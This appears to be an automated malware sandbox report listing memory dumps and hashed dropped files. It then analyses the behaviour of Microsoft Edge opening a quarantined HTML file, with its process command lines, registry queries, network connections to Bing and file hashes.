memory/3840-851-0x0000000000310000-0x000000000033F000-memory.dmp

memory/5212-852-0x0000000000760000-0x000000000117F000-memory.dmp

memory/3840-850-0x0000000000310000-0x000000000033F000-memory.dmp

memory/3840-856-0x0000000010000000-0x000000001001C000-memory.dmp

memory/5960-860-0x0000000000400000-0x000000000087F000-memory.dmp

memory/4920-862-0x0000000000460000-0x000000000093E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036390101\95fec32fd0.exe

MD5 bd6938a3e6bfd792f546742d669b6157
SHA1 9a69167c0d4d32ef6660faaa8ef6244ace7b29d9
SHA256 0c5789417d3d30ec72050cd456c8d46e5239ec9744f3db60fcc25e3725dc4228
SHA512 2fc768ff242ce51743c2ad9988f3e82bf8211d27926a8b134b3a938fcbe23c64c837668e9744ef450e663719972bd864e3d28e614403c97746172e4bc6f627ed

memory/2720-878-0x0000000000950000-0x0000000001586000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2M2U60MP\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Temp\10036400101\08a8bb090e.exe

MD5 91a6449e2fb889d229d9752ca2f836e9
SHA1 c2da050d1d736d6e59a0ea171cf8fa26392c74b4
SHA256 b122069004430dbae554686cb36cf3b954638639c197f6a10168d4e62d33cc0a
SHA512 ba553c9320b28bd37da75ce177e8292aecb789d7801a193ce941bf93350e7e13636e87d53f426b4755203a6a9da9584e203405fe0b00540dd3f0dde415571a02

memory/1608-896-0x00000000001F0000-0x000000000069F000-memory.dmp

memory/5960-895-0x0000000000400000-0x000000000087F000-memory.dmp

memory/4920-899-0x0000000000460000-0x000000000093E000-memory.dmp

memory/2720-901-0x0000000000950000-0x0000000001586000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036410101\8155f4d8b3.exe

MD5 60dd2030e1ff1f9a3406ddc438893694
SHA1 b01f2c39b1046bc892c9db78898e1c063b21836f
SHA256 d77580f219e5b86e38e34d2125862a58d03a76ac1b6dbb40bc4f65b114bbb4ee
SHA512 15f9aad02632481934b3f271debf73d5cf61bdd824d0f4a47e38b391186f7de16ba5f1d51f391625b945ff14b55d90cd31799b1483837aea732a45effef94246

memory/2236-919-0x00000000007B0000-0x000000000080C000-memory.dmp

memory/4512-921-0x0000000000400000-0x000000000045E000-memory.dmp

memory/4512-922-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2720-923-0x0000000000950000-0x0000000001586000-memory.dmp

memory/1608-926-0x00000000001F0000-0x000000000069F000-memory.dmp

memory/3904-928-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2720-931-0x0000000000950000-0x0000000001586000-memory.dmp

memory/3904-930-0x0000000000400000-0x000000000042F000-memory.dmp

memory/5828-940-0x0000000000400000-0x000000000087F000-memory.dmp

memory/3620-943-0x0000000000460000-0x000000000093E000-memory.dmp

memory/5960-942-0x0000000000400000-0x000000000087F000-memory.dmp

memory/3620-944-0x0000000000460000-0x000000000093E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036420101\b59e2e872a.exe

MD5 2b741a75b579116ba997b79d237139c2
SHA1 33a80223e48874ce5959606fda6e7435cb15e035
SHA256 246d7a524148b39f881eb6dfa3a9b6a2696781564fdaac5f81eb42e052fd6c44
SHA512 a98d667703d7f9e070597ea078676815da588e150c7d70f604e59303f8a44763ef976a1e72dbd4a91d135b96ca7536dbcc6e78e12cfe27d7ce1937fbdf954a38

memory/4920-958-0x0000000000460000-0x000000000093E000-memory.dmp

memory/5728-959-0x0000000000570000-0x000000000087C000-memory.dmp

memory/5728-968-0x0000000000570000-0x000000000087C000-memory.dmp

memory/1968-985-0x0000000000990000-0x00000000009EF000-memory.dmp

memory/5828-990-0x0000000000400000-0x000000000087F000-memory.dmp

memory/5960-1004-0x0000000000400000-0x000000000087F000-memory.dmp

memory/5828-1005-0x0000000000400000-0x000000000087F000-memory.dmp

memory/4920-1007-0x0000000000460000-0x000000000093E000-memory.dmp

memory/5960-1015-0x0000000000400000-0x000000000087F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\AVTX7ZEV\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

memory/5308-1030-0x0000000000460000-0x000000000093E000-memory.dmp

memory/5308-1032-0x0000000000460000-0x000000000093E000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

139s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4900 wrote to memory of 2732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 2732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3824 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 4284 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 4284 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4900 wrote to memory of 3772 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa207d46f8,0x7ffa207d4708,0x7ffa207d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2024 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,15814979439953251257,5904163262758049426,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3152 /prefetch:2

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e27df0383d108b2d6cd975d1b42b1afe
SHA1 c216daa71094da3ffa15c787c41b0bc7b32ed40b
SHA256 812f547f1e22a4bd045b73ff548025fabd59c6cba0da6991fdd8cfcb32653855
SHA512 471935e26a55d26449e48d4c38933ab8c369a92d8f24fd6077131247e8d116d95aa110dd424fa6095176a6c763a6271e978766e74d8022e9cdcc11e6355408ab

\??\pipe\LOCAL\crashpad_4900_PLXGAIZHPHGMWKTO

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 395082c6d7ec10a326236e60b79602f2
SHA1 203db9756fc9f65a0181ac49bca7f0e7e4edfb5b
SHA256 b9ea226a0a67039df83a9652b42bb7b0cc2e6fa827d55d043bc36dd9d8e4cd25
SHA512 7095c260b87a0e31ddfc5ddf5730848433dcede2672ca71091efb8c6b1b0fc3333d0540c3ce41087702c99bca22a4548f12692234188e6f457c2f75ab12316bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e40e2eadebab544b915596628efe888b
SHA1 a7db7d4a90b80f02be8d353415b58aca7a1c5221
SHA256 cd11b8b73e32b6896183a4cf223b671c3179ded9f57f9795eb3e8b2f9f5c172a
